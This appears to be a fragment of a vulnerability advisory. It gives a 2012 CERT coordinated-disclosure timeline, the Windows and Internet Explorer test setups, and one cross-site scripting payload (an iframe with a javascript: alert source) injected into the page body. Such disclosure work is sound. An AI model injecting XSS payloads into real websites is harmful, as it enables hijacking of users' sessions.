Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: Coordinated details with vendor
08 Aug 2012: Public Disclosure
Installed On: Windows Server 2003 SP2
Client Test OS: Windows XP Pro SP3 (x86)
Browser Used: Internet Explorer 8
Client Test OS: Windows 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9
Injection Point: Body
Injection Payload(s):
1: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>